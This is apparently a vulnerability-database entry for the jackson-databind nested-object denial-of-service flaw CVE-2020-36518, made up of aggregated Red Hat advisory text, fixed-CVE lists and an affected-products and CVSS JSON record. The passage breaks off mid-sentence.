An update for jackson-annotations, jackson-core, jackson-databind, jackson-jaxrs-providers, and jackson-modules-base is now available for Red Hat Enterprise Linux 9.
Red Hat Product Security has rated this update as having a security impact of Moderate. A Common Vulnerability Scoring System (CVSS) base score, which gives a detailed severity rating, is available for each vulnerability from the CVE link(s) in the References section.
- Relevant releases/architectures:
Red Hat Enterprise Linux AppStream (v. 9) - noarch
- Description:
Jackson is a suite of data-processing tools for Java, including the flagship streaming JSON parser / generator library, matching data-binding library, and additional modules to process data encoded in various other data formats.
Additional Changes:
For detailed information on changes in this release, see the Red Hat Enterprise Linux 9.2 Release Notes linked from the References section.
- Solution:
For details on how to apply this update, which includes the changes described in this advisory, refer to:
https://access.redhat.com/articles/11258
- Package List:
Red Hat Enterprise Linux AppStream (v. 9):
Source: jackson-annotations-2.14.1-1.el9.src.rpm jackson-core-2.14.1-2.el9.src.rpm jackson-databind-2.14.1-2.el9.src.rpm jackson-jaxrs-providers-2.14.1-2.el9.src.rpm jackson-modules-base-2.14.1-2.el9.src.rpm
noarch: pki-jackson-annotations-2.14.1-1.el9.noarch.rpm pki-jackson-core-2.14.1-2.el9.noarch.rpm pki-jackson-databind-2.14.1-2.el9.noarch.rpm pki-jackson-jaxrs-json-provider-2.14.1-2.el9.noarch.rpm pki-jackson-jaxrs-providers-2.14.1-2.el9.noarch.rpm pki-jackson-module-jaxb-annotations-2.14.1-2.el9.noarch.rpm
These packages are GPG signed by Red Hat for security. Our key and details on how to verify the signature are available from https://access.redhat.com/security/team/key/
- References:
https://access.redhat.com/security/cve/CVE-2020-36518 https://access.redhat.com/security/updates/classification/#moderate https://access.redhat.com/documentation/en-us/red_hat_enterprise_linux/9/html/9.2_release_notes/index
- Contact:
The Red Hat security contact is secalert@redhat.com. More contact details at https://access.redhat.com/security/team/contact/
Copyright 2023 Red Hat, Inc. -----BEGIN PGP SIGNATURE----- Version: GnuPG v1
iQIVAwUBZFo1ONzjgjWX9erEAQhQXA//RhJAsKLGfyB+T7HQRwsWYj9OoKCzMCkc ScXoI5eI1LYKZijOPfLHj63Zp/DO+pAJLCaHdb+S+OKRddCSsHRQPw4x0tBWNPPW FBcrbxITZEbyW3WWe7BSE9/HK0ckojEJIaxmBYTsRc8zErXMmPLKGAwODWC0ohjs 8RGmfV5Cj8OzhprS0MWKrbydlv/kUzr/vayM870hRGIwg1+vE3owWYLGN8ZAwqcs 3J/N3OMheZiUk3MxPCkk92sJmpuEmGQrPPL2+I5/lXMRo4SEq3sairxkAwER10i1 kXxF8aFwgHYv5oaD06B+PuIFEQ26Clc97oMMbYBEFDYVGa5pIPNZ0dG16QPO9HLT Co0oFQ/y77HrzmM5FCUI6Zlgt8fccvc2Cg4VGG473zTAkQ0JvsZtbIjH4PVfoMp8 5Rrvk2YZJCTKdjB+7RkgnTZBQ8Xar1XwMBTQ1Zq6Z1b+ERTc8s+ihIOjD86cd+J7 TLPf/fDiy6arGI13lCa81Ssyg2iWOzySHUEag0Fs1eYKWMSoKMuSuywH7e0hjFKG +AqSml6lTxNvwGZ13ieMGslOGRFk01GR6R2BbwnDicXXhqv1O2kuaDenf9HQBteR KsTKBi7dBqdoHwGBpVb8gRxntlKQQKsKv1wpA+A2yDFu4umBxcUoZ9fT2WnI12UH cvdlmKHSc9E=W5RJ -----END PGP SIGNATURE----- -- RHSA-announce mailing list RHSA-announce@redhat.com https://listman.redhat.com/mailman/listinfo/rhsa-announce . The purpose of this text-only errata is to inform you about the security issues fixed in this release.
Installation instructions are available from the Fuse 7.11.0 product documentation page: https://access.redhat.com/documentation/en-us/red_hat_fuse/7.11/
- Bugs fixed (https://bugzilla.redhat.com/):
1838332 - CVE-2020-9484 tomcat: deserialization flaw in session persistence storage leading to RCE 1887810 - CVE-2020-15250 junit4: TemporaryFolder is shared between all users across system which could result in information disclosure 1893070 - CVE-2020-25689 wildfly-core: memory leak in WildFly host-controller in domain mode while not able to reconnect to domain-controller 1893125 - CVE-2020-7020 elasticsearch: not properly preserving security permissions when executing complex queries may lead to information disclosure 1917209 - CVE-2021-24122 tomcat: Information disclosure when using NTFS file system 1930291 - CVE-2020-29582 kotlin: vulnerable Java API was used for temporary file and folder creation which could result in information disclosure 1934032 - CVE-2021-25122 tomcat: Request mix-up with h2c 1934061 - CVE-2021-25329 tomcat: Incomplete fix for CVE-2020-9484 (RCE via session persistence) 1966735 - CVE-2021-29505 XStream: remote command execution attack by manipulating the processed input stream 1973413 - CVE-2021-33813 jdom: XXE allows attackers to cause a DoS via a crafted HTTP request 1976052 - CVE-2021-3644 wildfly-core: Invalid Sensitivity Classification of Vault Expression 1977064 - CVE-2021-22119 spring-security: Denial-of-Service (DoS) attack via initiation of Authorization Request 1977362 - CVE-2021-3629 undertow: potential security issue in flow control over HTTP/2 may lead to DOS 1981407 - CVE-2021-3642 wildfly-elytron: possible timing attack in ScramServer 1981533 - CVE-2021-33037 tomcat: HTTP request smuggling when used with a reverse proxy 1981544 - CVE-2021-30640 tomcat: JNDI realm authentication weakness 1981895 - CVE-2021-35515 apache-commons-compress: infinite loop when reading a specially crafted 7Z archive 1981900 - CVE-2021-35516 apache-commons-compress: excessive memory allocation when reading a specially crafted 7Z archive 1981903 - CVE-2021-35517 apache-commons-compress: excessive memory allocation when reading a specially crafted TAR archive 1981909 - CVE-2021-36090 apache-commons-compress: excessive memory allocation when reading a specially crafted ZIP archive 2004820 - CVE-2021-41079 tomcat: Infinite loop while reading an unexpected TLS packet when using OpenSSL JSSE engine 2007557 - CVE-2021-3807 nodejs-ansi-regex: Regular expression denial of service (ReDoS) matching ANSI escape codes 2009041 - CVE-2021-38153 Kafka: Timing Attack Vulnerability for Apache Kafka Connect and Clients 2010378 - CVE-2021-3859 undertow: client side invocation timeout raised when calling over HTTP2 2011190 - CVE-2021-40690 xml-security: XPath Transform abuse allows for information disclosure 2014356 - CVE-2021-42340 tomcat: OutOfMemoryError caused by HTTP upgrade connection leak could lead to DoS 2020583 - CVE-2021-2471 mysql-connector-java: unauthorized access to critical 2031958 - CVE-2021-43797 netty: control chars in header names may lead to HTTP request smuggling 2033560 - CVE-2021-42550 logback: remote code execution through JNDI call from within its configuration file 2034388 - CVE-2021-4178 kubernetes-client: Insecure deserialization in unmarshalYaml method 2034584 - CVE-2021-22096 springframework: malicious input leads to insertion of additional log entries 2039903 - CVE-2021-22569 protobuf-java: potential DoS in the parsing procedure for binary data 2044596 - CVE-2022-23221 h2: Loading of custom classes from remote servers through JNDI 2046279 - CVE-2022-22932 karaf: path traversal flaws 2046282 - CVE-2021-41766 karaf: insecure java deserialization 2047343 - CVE-2022-21363 mysql-connector-java: Difficult to exploit vulnerability allows high privileged attacker with network access via multiple protocols to compromise MySQL Connectors 2047417 - CVE-2022-23181 tomcat: local privilege escalation vulnerability 2049778 - CVE-2022-23596 junrar: A carefully crafted RAR archive can trigger an infinite loop while extracting 2049783 - CVE-2021-43859 xstream: Injecting highly recursive collections or maps can cause a DoS 2050863 - CVE-2022-21724 jdbc-postgresql: Unchecked Class Instantiation when providing Plugin Classes 2055480 - CVE-2021-22060 springframework: Additional Log Injection in Spring Framework (follow-up to CVE-2021-22096) 2058763 - CVE-2022-24614 metadata-extractor: Out-of-memory when reading a specially crafted JPEG file 2063292 - CVE-2022-26336 poi-scratchpad: A carefully crafted TNEF file can cause an out of memory exception 2063601 - CVE-2022-23913 artemis-commons: Apache ActiveMQ Artemis DoS 2064007 - CVE-2022-26520 postgresql-jdbc: Arbitrary File Write Vulnerability 2064226 - CVE-2022-0084 xnio: org.xnio.StreamConnection.notifyReadClosed log to debug instead of stderr 2064698 - CVE-2020-36518 jackson-databind: denial of service via a large depth of nested objects 2069414 - CVE-2022-22950 spring-expression: Denial of service via specially crafted SpEL expression 2072339 - CVE-2022-1259 undertow: potential security issue in flow control over HTTP/2 may lead to DOS(incomplete fix for CVE-2021-3629) 2073890 - CVE-2022-1319 undertow: Double AJP response for 400 from EAP 7 results in CPING failures 2075441 - CVE-2022-22968 Spring Framework: Data Binding Rules Vulnerability 2081879 - CVE-2021-22573 google-oauth-client: Token signature not verified 2087214 - CVE-2022-22976 springframework: BCrypt skips salt rounds for work factor of 31 2087272 - CVE-2022-22970 springframework: DoS via data binding to multipartFile or servlet part 2087274 - CVE-2022-22971 springframework: DoS with STOMP over WebSocket 2087606 - CVE-2022-22978 springframework: Authorization Bypass in RegexRequestMatcher 2088523 - CVE-2022-30126 tika-core: Regular Expression Denial of Service in standards extractor 2100654 - CVE-2022-25845 fastjson: autoType shutdown restriction bypass leads to deserialization
5
Show details on source website{
"affected_products": {
"_id": null,
"data": [
{
"_id": null,
"model": "primavera p6 enterprise project portfolio management",
"scope": "gte",
"trust": 1.0,
"vendor": "oracle",
"version": "17.12.0.0"
},
{
"_id": null,
"model": "linux",
"scope": "eq",
"trust": 1.0,
"vendor": "debian",
"version": "10.0"
},
{
"_id": null,
"model": "primavera gateway",
"scope": "lte",
"trust": 1.0,
"vendor": "oracle",
"version": "17.12.11"
},
{
"_id": null,
"model": "primavera gateway",
"scope": "lte",
"trust": 1.0,
"vendor": "oracle",
"version": "19.12.13"
},
{
"_id": null,
"model": "sd-wan edge",
"scope": "eq",
"trust": 1.0,
"vendor": "oracle",
"version": "9.1"
},
{
"_id": null,
"model": "utilities framework",
"scope": "eq",
"trust": 1.0,
"vendor": "oracle",
"version": "4.4.0.3.0"
},
{
"_id": null,
"model": "communications cloud native core network repository function",
"scope": "eq",
"trust": 1.0,
"vendor": "oracle",
"version": "22.2.0"
},
{
"_id": null,
"model": "financial services analytical applications infrastructure",
"scope": "eq",
"trust": 1.0,
"vendor": "oracle",
"version": "8.1.2.0"
},
{
"_id": null,
"model": "oncommand workflow automation",
"scope": "eq",
"trust": 1.0,
"vendor": "netapp",
"version": null
},
{
"_id": null,
"model": "primavera p6 enterprise project portfolio management",
"scope": "lte",
"trust": 1.0,
"vendor": "oracle",
"version": "17.12.20.4"
},
{
"_id": null,
"model": "weblogic server",
"scope": "eq",
"trust": 1.0,
"vendor": "oracle",
"version": "12.2.1.3.0"
},
{
"_id": null,
"model": "primavera unifier",
"scope": "eq",
"trust": 1.0,
"vendor": "oracle",
"version": "18.0"
},
{
"_id": null,
"model": "financial services crime and compliance management studio",
"scope": "eq",
"trust": 1.0,
"vendor": "oracle",
"version": "8.0.8.3.0"
},
{
"_id": null,
"model": "global lifecycle management nextgen oui framework",
"scope": "eq",
"trust": 1.0,
"vendor": "oracle",
"version": "13.9.4.2.2"
},
{
"_id": null,
"model": "weblogic server",
"scope": "eq",
"trust": 1.0,
"vendor": "oracle",
"version": "12.2.1.4.0"
},
{
"_id": null,
"model": "primavera unifier",
"scope": "eq",
"trust": 1.0,
"vendor": "oracle",
"version": "20.12"
},
{
"_id": null,
"model": "big data spatial and graph",
"scope": "lt",
"trust": 1.0,
"vendor": "oracle",
"version": "23.1"
},
{
"_id": null,
"model": "financial services enterprise case management",
"scope": "lte",
"trust": 1.0,
"vendor": "oracle",
"version": "8.1.2.1"
},
{
"_id": null,
"model": "communications cloud native core console",
"scope": "eq",
"trust": 1.0,
"vendor": "oracle",
"version": "1.9.0"
},
{
"_id": null,
"model": "financial services enterprise case management",
"scope": "eq",
"trust": 1.0,
"vendor": "oracle",
"version": "8.0.8.1"
},
{
"_id": null,
"model": "peoplesoft enterprise peopletools",
"scope": "eq",
"trust": 1.0,
"vendor": "oracle",
"version": "8.59"
},
{
"_id": null,
"model": "sd-wan edge",
"scope": "eq",
"trust": 1.0,
"vendor": "oracle",
"version": "9.0"
},
{
"_id": null,
"model": "financial services behavior detection platform",
"scope": "gte",
"trust": 1.0,
"vendor": "oracle",
"version": "8.1.1.0"
},
{
"_id": null,
"model": "primavera p6 enterprise project portfolio management",
"scope": "lte",
"trust": 1.0,
"vendor": "oracle",
"version": "19.12.19.0"
},
{
"_id": null,
"model": "communications cloud native core security edge protection proxy",
"scope": "eq",
"trust": 1.0,
"vendor": "oracle",
"version": "22.1.1"
},
{
"_id": null,
"model": "financial services trade-based anti money laundering",
"scope": "eq",
"trust": 1.0,
"vendor": "oracle",
"version": "8.0.8"
},
{
"_id": null,
"model": "health sciences empirica signal",
"scope": "eq",
"trust": 1.0,
"vendor": "oracle",
"version": "9.1.0.5.2"
},
{
"_id": null,
"model": "communications cloud native core service communication proxy",
"scope": "eq",
"trust": 1.0,
"vendor": "oracle",
"version": "22.2.0"
},
{
"_id": null,
"model": "commerce platform",
"scope": "eq",
"trust": 1.0,
"vendor": "oracle",
"version": "11.3.1"
},
{
"_id": null,
"model": "financial services behavior detection platform",
"scope": "eq",
"trust": 1.0,
"vendor": "oracle",
"version": "8.0.8"
},
{
"_id": null,
"model": "primavera p6 enterprise project portfolio management",
"scope": "gte",
"trust": 1.0,
"vendor": "oracle",
"version": "18.8.0.0"
},
{
"_id": null,
"model": "primavera unifier",
"scope": "eq",
"trust": 1.0,
"vendor": "oracle",
"version": "21.12"
},
{
"_id": null,
"model": "financial services behavior detection platform",
"scope": "eq",
"trust": 1.0,
"vendor": "oracle",
"version": "8.0.7.0.0"
},
{
"_id": null,
"model": "utilities framework",
"scope": "eq",
"trust": 1.0,
"vendor": "oracle",
"version": "4.3.0.5.0"
},
{
"_id": null,
"model": "financial services analytical applications infrastructure",
"scope": "gte",
"trust": 1.0,
"vendor": "oracle",
"version": "8.0.7"
},
{
"_id": null,
"model": "utilities framework",
"scope": "eq",
"trust": 1.0,
"vendor": "oracle",
"version": "4.3.0.6.0"
},
{
"_id": null,
"model": "primavera p6 enterprise project portfolio management",
"scope": "gte",
"trust": 1.0,
"vendor": "oracle",
"version": "20.12.0.0"
},
{
"_id": null,
"model": "financial services behavior detection platform",
"scope": "lte",
"trust": 1.0,
"vendor": "oracle",
"version": "8.1.2.1"
},
{
"_id": null,
"model": "snap creator framework",
"scope": "eq",
"trust": 1.0,
"vendor": "netapp",
"version": null
},
{
"_id": null,
"model": "commerce platform",
"scope": "eq",
"trust": 1.0,
"vendor": "oracle",
"version": "11.3.0"
},
{
"_id": null,
"model": "global lifecycle management nextgen oui framework",
"scope": "lt",
"trust": 1.0,
"vendor": "oracle",
"version": "13.9.4.2.2"
},
{
"_id": null,
"model": "financial services crime and compliance management studio",
"scope": "eq",
"trust": 1.0,
"vendor": "oracle",
"version": "8.0.8.2.0"
},
{
"_id": null,
"model": "global lifecycle management opatch",
"scope": "lt",
"trust": 1.0,
"vendor": "oracle",
"version": "12.2.0.1.30"
},
{
"_id": null,
"model": "financial services analytical applications infrastructure",
"scope": "eq",
"trust": 1.0,
"vendor": "oracle",
"version": "8.1.1.0"
},
{
"_id": null,
"model": "primavera gateway",
"scope": "lte",
"trust": 1.0,
"vendor": "oracle",
"version": "21.12.1"
},
{
"_id": null,
"model": "primavera p6 enterprise project portfolio management",
"scope": "lte",
"trust": 1.0,
"vendor": "oracle",
"version": "18.8.25.4"
},
{
"_id": null,
"model": "primavera gateway",
"scope": "gte",
"trust": 1.0,
"vendor": "oracle",
"version": "17.12.0"
},
{
"_id": null,
"model": "communications billing and revenue management",
"scope": "lte",
"trust": 1.0,
"vendor": "oracle",
"version": "12.0.0.6.0"
},
{
"_id": null,
"model": "jackson-databind",
"scope": "gte",
"trust": 1.0,
"vendor": "fasterxml",
"version": "2.13.0"
},
{
"_id": null,
"model": "utilities framework",
"scope": "eq",
"trust": 1.0,
"vendor": "oracle",
"version": "4.4.0.5.0"
},
{
"_id": null,
"model": "communications billing and revenue management",
"scope": "gte",
"trust": 1.0,
"vendor": "oracle",
"version": "12.0.0.4.0"
},
{
"_id": null,
"model": "communications cloud native core network slice selection function",
"scope": "eq",
"trust": 1.0,
"vendor": "oracle",
"version": "22.1.0"
},
{
"_id": null,
"model": "primavera p6 enterprise project portfolio management",
"scope": "lte",
"trust": 1.0,
"vendor": "oracle",
"version": "21.12.4.0"
},
{
"_id": null,
"model": "weblogic server",
"scope": "eq",
"trust": 1.0,
"vendor": "oracle",
"version": "14.1.1.0.0"
},
{
"_id": null,
"model": "cloud insights acquisition unit",
"scope": "eq",
"trust": 1.0,
"vendor": "netapp",
"version": null
},
{
"_id": null,
"model": "jackson-databind",
"scope": "lt",
"trust": 1.0,
"vendor": "fasterxml",
"version": "2.13.2.1"
},
{
"_id": null,
"model": "primavera gateway",
"scope": "gte",
"trust": 1.0,
"vendor": "oracle",
"version": "19.12.0"
},
{
"_id": null,
"model": "communications cloud native core network slice selection function",
"scope": "eq",
"trust": 1.0,
"vendor": "oracle",
"version": "22.1.1"
},
{
"_id": null,
"model": "spatial studio",
"scope": "lt",
"trust": 1.0,
"vendor": "oracle",
"version": "20.1.0"
},
{
"_id": null,
"model": "financial services trade-based anti money laundering",
"scope": "eq",
"trust": 1.0,
"vendor": "oracle",
"version": "8.0.7"
},
{
"_id": null,
"model": "communications cloud native core binding support function",
"scope": "eq",
"trust": 1.0,
"vendor": "oracle",
"version": "22.1.3"
},
{
"_id": null,
"model": "utilities framework",
"scope": "eq",
"trust": 1.0,
"vendor": "oracle",
"version": "4.4.0.2.0"
},
{
"_id": null,
"model": "primavera gateway",
"scope": "gte",
"trust": 1.0,
"vendor": "oracle",
"version": "18.8.0"
},
{
"_id": null,
"model": "financial services enterprise case management",
"scope": "gte",
"trust": 1.0,
"vendor": "oracle",
"version": "8.1.1.0"
},
{
"_id": null,
"model": "retail sales audit",
"scope": "eq",
"trust": 1.0,
"vendor": "oracle",
"version": "15.0.3.1"
},
{
"_id": null,
"model": "primavera unifier",
"scope": "gte",
"trust": 1.0,
"vendor": "oracle",
"version": "17.0"
},
{
"_id": null,
"model": "financial services enterprise case management",
"scope": "eq",
"trust": 1.0,
"vendor": "oracle",
"version": "8.0.7.2"
},
{
"_id": null,
"model": "financial services analytical applications infrastructure",
"scope": "lte",
"trust": 1.0,
"vendor": "oracle",
"version": "8.1.0.0"
},
{
"_id": null,
"model": "oncommand insight",
"scope": "eq",
"trust": 1.0,
"vendor": "netapp",
"version": null
},
{
"_id": null,
"model": "linux",
"scope": "eq",
"trust": 1.0,
"vendor": "debian",
"version": "9.0"
},
{
"_id": null,
"model": "commerce platform",
"scope": "eq",
"trust": 1.0,
"vendor": "oracle",
"version": "11.3.2"
},
{
"_id": null,
"model": "financial services enterprise case management",
"scope": "eq",
"trust": 1.0,
"vendor": "oracle",
"version": "8.0.8.0"
},
{
"_id": null,
"model": "financial services enterprise case management",
"scope": "eq",
"trust": 1.0,
"vendor": "oracle",
"version": "8.0.7.1"
},
{
"_id": null,
"model": "primavera gateway",
"scope": "gte",
"trust": 1.0,
"vendor": "oracle",
"version": "21.12.0"
},
{
"_id": null,
"model": "jackson-databind",
"scope": "lt",
"trust": 1.0,
"vendor": "fasterxml",
"version": "2.12.6.1"
},
{
"_id": null,
"model": "financial services analytical applications infrastructure",
"scope": "eq",
"trust": 1.0,
"vendor": "oracle",
"version": "8.1.2.1"
},
{
"_id": null,
"model": "primavera unifier",
"scope": "lte",
"trust": 1.0,
"vendor": "oracle",
"version": "17.12"
},
{
"_id": null,
"model": "primavera gateway",
"scope": "lte",
"trust": 1.0,
"vendor": "oracle",
"version": "20.12.18"
},
{
"_id": null,
"model": "active iq unified manager",
"scope": "eq",
"trust": 1.0,
"vendor": "netapp",
"version": null
},
{
"_id": null,
"model": "utilities framework",
"scope": "eq",
"trust": 1.0,
"vendor": "oracle",
"version": "4.4.0.0.0"
},
{
"_id": null,
"model": "primavera gateway",
"scope": "gte",
"trust": 1.0,
"vendor": "oracle",
"version": "20.12.0"
},
{
"_id": null,
"model": "communications cloud native core unified data repository",
"scope": "eq",
"trust": 1.0,
"vendor": "oracle",
"version": "22.2.0"
},
{
"_id": null,
"model": "graph server and client",
"scope": "lt",
"trust": 1.0,
"vendor": "oracle",
"version": "22.2.0"
},
{
"_id": null,
"model": "primavera unifier",
"scope": "eq",
"trust": 1.0,
"vendor": "oracle",
"version": "19.12"
},
{
"_id": null,
"model": "linux",
"scope": "eq",
"trust": 1.0,
"vendor": "debian",
"version": "11.0"
},
{
"_id": null,
"model": "communications cloud native core network repository function",
"scope": "eq",
"trust": 1.0,
"vendor": "oracle",
"version": "22.1.2"
},
{
"_id": null,
"model": "coherence",
"scope": "eq",
"trust": 1.0,
"vendor": "oracle",
"version": "14.1.1.0.0"
},
{
"_id": null,
"model": "primavera gateway",
"scope": "lte",
"trust": 1.0,
"vendor": "oracle",
"version": "18.8.14"
},
{
"_id": null,
"model": "peoplesoft enterprise peopletools",
"scope": "eq",
"trust": 1.0,
"vendor": "oracle",
"version": "8.58"
},
{
"_id": null,
"model": "primavera p6 enterprise project portfolio management",
"scope": "gte",
"trust": 1.0,
"vendor": "oracle",
"version": "19.12.0"
}
],
"sources": [
{
"db": "NVD",
"id": "CVE-2020-36518"
}
]
},
"credits": {
"_id": null,
"data": "Red Hat",
"sources": [
{
"db": "PACKETSTORM",
"id": "168621"
},
{
"db": "PACKETSTORM",
"id": "178714"
},
{
"db": "PACKETSTORM",
"id": "169729"
},
{
"db": "PACKETSTORM",
"id": "169727"
},
{
"db": "PACKETSTORM",
"id": "170162"
},
{
"db": "PACKETSTORM",
"id": "172453"
},
{
"db": "PACKETSTORM",
"id": "172220"
},
{
"db": "PACKETSTORM",
"id": "167841"
}
],
"trust": 0.8
},
"cve": "CVE-2020-36518",
"cvss": {
"_id": null,
"data": [
{
"cvssV2": [
{
"accessComplexity": "LOW",
"accessVector": "NETWORK",
"authentication": "NONE",
"author": "nvd@nist.gov",
"availabilityImpact": "PARTIAL",
"baseScore": 5.0,
"confidentialityImpact": "NONE",
"exploitabilityScore": 10.0,
"id": "CVE-2020-36518",
"impactScore": 2.9,
"integrityImpact": "NONE",
"severity": "MEDIUM",
"trust": 1.1,
"vectorString": "AV:N/AC:L/Au:N/C:N/I:N/A:P",
"version": "2.0"
},
{
"accessComplexity": "LOW",
"accessVector": "NETWORK",
"authentication": "NONE",
"author": "VULHUB",
"availabilityImpact": "PARTIAL",
"baseScore": 5.0,
"confidentialityImpact": "NONE",
"exploitabilityScore": 10.0,
"id": "VHN-415522",
"impactScore": 2.9,
"integrityImpact": "NONE",
"severity": "MEDIUM",
"trust": 0.1,
"vectorString": "AV:N/AC:L/AU:N/C:N/I:N/A:P",
"version": "2.0"
}
],
"cvssV3": [
{
"attackComplexity": "LOW",
"attackVector": "NETWORK",
"author": "nvd@nist.gov",
"availabilityImpact": "HIGH",
"baseScore": 7.5,
"baseSeverity": "HIGH",
"confidentialityImpact": "NONE",
"exploitabilityScore": 3.9,
"id": "CVE-2020-36518",
"impactScore": 3.6,
"integrityImpact": "NONE",
"privilegesRequired": "NONE",
"scope": "UNCHANGED",
"trust": 2.0,
"userInteraction": "NONE",
"vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H",
"version": "3.1"
}
],
"severity": [
{
"author": "nvd@nist.gov",
"id": "CVE-2020-36518",
"trust": 1.0,
"value": "HIGH"
},
{
"author": "134c704f-9b21-4f2e-91b3-4a467353bcc0",
"id": "CVE-2020-36518",
"trust": 1.0,
"value": "HIGH"
},
{
"author": "VULHUB",
"id": "VHN-415522",
"trust": 0.1,
"value": "MEDIUM"
},
{
"author": "VULMON",
"id": "CVE-2020-36518",
"trust": 0.1,
"value": "MEDIUM"
}
]
}
],
"sources": [
{
"db": "VULHUB",
"id": "VHN-415522"
},
{
"db": "VULMON",
"id": "CVE-2020-36518"
},
{
"db": "NVD",
"id": "CVE-2020-36518"
},
{
"db": "NVD",
"id": "CVE-2020-36518"
}
]
},
"description": {
"_id": null,
"data": "jackson-databind before 2.13.0 allows a Java StackOverflow exception and denial of service via a large depth of nested objects. Description:\n\nRed Hat Single Sign-On 7.5 is a standalone server, based on the Keycloak\nproject, that provides authentication and standards-based single sign-on\ncapabilities for web and mobile applications. Solution:\n\nBefore applying this update, make sure all previously released errata\nrelevant to your system have been applied. Bugs fixed (https://bugzilla.redhat.com/):\n\n2031958 - CVE-2021-43797 netty: control chars in header names may lead to HTTP request smuggling\n2039403 - CVE-2021-42392 h2: Remote Code Execution in Console\n2040268 - CVE-2022-0225 keycloak: Stored XSS in groups dropdown\n2060929 - CVE-2022-0866 wildfly: Wildfly management of EJB Session context returns wrong caller principal with Elytron Security enabled\n2064226 - CVE-2022-0084 xnio: org.xnio.StreamConnection.notifyReadClosed log to debug instead of stderr\n2064698 - CVE-2020-36518 jackson-databind: denial of service via a large depth of nested objects\n2101942 - CVE-2022-2256 keycloak: improper input validation permits script injection\n2115392 - CVE-2022-2668 keycloak: Uploading of SAML javascript protocol mapper scripts through the admin console\n\n6. \n\nThe following advisory data is extracted from:\n\nhttps://access.redhat.com/security/data/csaf/v2/advisories/2024/rhsa-2024_3061.json\n\nRed Hat officially shut down their mailing list notifications October 10, 2023. Due to this, Packet Storm has recreated the below data as a reference point to raise awareness. It must be noted that due to an inability to easily track revision updates without crawling Red Hat\u0027s archive, these advisories are single notifications and we strongly suggest that you visit the Red Hat provided links to ensure you have the latest information available if the subject matter listed pertains to your environment. Solution:\n\nFor OpenShift Container Platform 4.11 see the following documentation,\nwhich will be updated shortly for this release, for important instructions\non how to upgrade your cluster and fully apply this errata update:\n\nhttps://docs.openshift.com/container-platform/4.11/release_notes/ocp-4-11-release-notes.html\n\nFor Red Hat OpenShift Logging 5.5, see the following instructions to apply\nthis update:\n\nhttps://docs.openshift.com/container-platform/4.11/logging/cluster-logging-upgrading.html\n\n4. JIRA issues fixed (https://issues.jboss.org/):\n\nLOG-2860 - Error on LokiStack Components when forwarding logs to Loki on proxy cluster\nLOG-3131 - vector: kube API server certificate validation failure due to hostname mismatch\nLOG-3222 - [release-5.5] fluentd plugin for kafka ca-bundle secret doesn\u0027t support multiple CAs\nLOG-3226 - FluentdQueueLengthIncreasing rule failing to be evaluated. \nLOG-3284 - [release-5.5][Vector] logs parsed into structured when json is set without structured types. \nLOG-3287 - [release-5.5] Increase value of cluster-logging PriorityClass to move closer to system-cluster-critical value\nLOG-3301 - [release-5.5][ClusterLogging] elasticsearchStatus in ClusterLogging instance CR is not updated when Elasticsearch status is changed\nLOG-3305 - [release-5.5] Kibana Authentication Exception cookie issue\nLOG-3310 - [release-5.5] Can\u0027t choose correct CA ConfigMap Key when creating lokistack in Console\nLOG-3332 - [release-5.5] Reconcile error on controller when creating LokiStack with tls config\n\n6. Description:\n\nRed Hat AMQ Streams, based on the Apache Kafka project, offers a\ndistributed backbone that allows microservices and other applications to\nshare data with extremely high throughput and extremely low latency. \n\nSecurity Fix(es):\n\n* scala: deserialization gadget chain (CVE-2022-36944)\n\n* json-smart: Uncontrolled Resource Consumption vulnerability in json-smart\n(Resource Exhaustion) (CVE-2023-1370)\n\n* jackson-databind: denial of service via a large depth of nested objects\n(CVE-2020-36518)\n\n* okhttp: information disclosure via improperly used cryptographic function\n(CVE-2021-0341)\n\n* netty-codec: Bzip2Decoder doesn\u0027t allow setting size restrictions for\ndecompressed data (CVE-2021-37136)\n\n* netty-codec: SnappyFrameDecoder doesn\u0027t restrict chunk length and may\nbuffer skippable chunks in an unnecessary way (CVE-2021-37137)\n\n* jackson-databind: Possible DoS if using JDK serialization to serialize\nJsonNode (CVE-2021-46877)\n\n* netty: world readable temporary file containing sensitive data\n(CVE-2022-24823)\n\n* jettison: parser crash by stackoverflow (CVE-2022-40149)\n\n* jackson-databind: deep wrapper array nesting wrt\nUNWRAP_SINGLE_VALUE_ARRAYS (CVE-2022-42003)\n\n* jackson-databind: use of deeply nested arrays (CVE-2022-42004)\n\n* Red Hat A-MQ Streams: component version with information disclosure flaw\n(CVE-2023-0833)\n\n* jettison: memory exhaustion via user-supplied XML or JSON data\n(CVE-2022-40150)\n\nFor more details about the security issue(s), including the impact, a CVSS\nscore, acknowledgments, and other related information, refer to the CVE\npage(s) listed in the References section. Solution:\n\nBefore applying the update, back up your existing installation, including\nall applications, configuration files, databases and database settings, and\nso on. \n\nThe References section of this erratum contains a download link (you must\nlog in to download the update). Bugs fixed (https://bugzilla.redhat.com/):\n\n2004133 - CVE-2021-37136 netty-codec: Bzip2Decoder doesn\u0027t allow setting size restrictions for decompressed data\n2004135 - CVE-2021-37137 netty-codec: SnappyFrameDecoder doesn\u0027t restrict chunk length and may buffer skippable chunks in an unnecessary way\n2064698 - CVE-2020-36518 jackson-databind: denial of service via a large depth of nested objects\n2087186 - CVE-2022-24823 netty: world readable temporary file containing sensitive data\n2129809 - CVE-2022-36944 scala: deserialization gadget chain\n2135244 - CVE-2022-42003 jackson-databind: deep wrapper array nesting wrt UNWRAP_SINGLE_VALUE_ARRAYS\n2135247 - CVE-2022-42004 jackson-databind: use of deeply nested arrays\n2135770 - CVE-2022-40150 jettison: memory exhaustion via user-supplied XML or JSON data\n2135771 - CVE-2022-40149 jettison: parser crash by stackoverflow\n2154086 - CVE-2021-0341 okhttp: information disclosure via improperly used cryptographic function\n2169845 - CVE-2023-0833 Red Hat A-MQ Streams: component version with information disclosure flaw\n2185707 - CVE-2021-46877 jackson-databind: Possible DoS if using JDK serialization to serialize JsonNode\n2188542 - CVE-2023-1370 json-smart: Uncontrolled Resource Consumption vulnerability in json-smart (Resource Exhaustion)\n\n5. JIRA issues fixed (https://issues.jboss.org/):\n\nENTMQST-4107 - [KAFKA] MM2 connector task stopped and didn?t result in failed state\nENTMQST-4541 - [PROD] Create RHSA erratum for Streams 2.4.0\n\n6. -----BEGIN PGP SIGNED MESSAGE-----\nHash: SHA256\n\n==================================================================== \nRed Hat Security Advisory\n\nSynopsis: Moderate: jackson security update\nAdvisory ID: RHSA-2023:2312-01\nProduct: Red Hat Enterprise Linux\nAdvisory URL: https://access.redhat.com/errata/RHSA-2023:2312\nIssue date: 2023-05-09\nCVE Names: CVE-2020-36518\n====================================================================\n1. Summary:\n\nAn 